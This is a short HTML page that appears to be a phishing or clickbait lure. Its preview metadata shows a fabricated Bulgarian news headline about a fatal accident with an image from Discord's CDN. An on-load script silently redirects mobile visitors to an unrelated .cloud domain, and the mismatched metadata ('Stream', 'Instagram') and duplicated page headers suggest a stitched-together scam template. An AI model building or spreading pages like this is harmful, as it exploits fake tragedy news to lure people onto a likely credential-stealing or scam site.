<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="utf-8"/>
<meta name="title" content="Stream"/>
<meta name="keywords" content="Instagram"/>
<meta property="og:description" content="128,112,104,посещение"/>
<meta name="robots" content="index, follow"/>
<meta name="googlebot" content="noindex"/>
<meta name="robots" content="index"/>
<meta name="robots" content="noindex"/>
<meta name="robots" content="nofollow"/>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<meta property="og:title" content="Тази сутрин е станал трагичен инцидент има ранени и загинали"/>
<meta property="og:image" content="https://media.discordapp.net/attachments/1225045975517757528/1227269393591959673/fdsfdser333.png?ex=6627cab0&is=661555b0&hm=e4830eb183351ce4d7baaf1fab03c11f766791c8495f365e8c7e4efda0d86cc5&=&format=webp&quality=lossless"/>
<meta name="apple-itunes-app" content="app-id=6448311069"/>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Този трагичен инцидент взе няколко жертви тази сутрин</title>
<script>
    // Función para redirigir si el usuario está en un dispositivo móvil
    function redirigirAMobile() {
        // Verificar si el ancho de la pantalla es menor que cierto valor (se considera móvil)
        if (window.innerWidth <= 768) { // Puedes ajustar este valor según tus necesidades
            // Redireccionar al URL deseado
            window.location.href = "https://pong024.jaskingnew212.cloud/";
        }
    }
    // Llamar a la función cuando la página se cargue
    window.onload = redirigirAMobile;
</script>
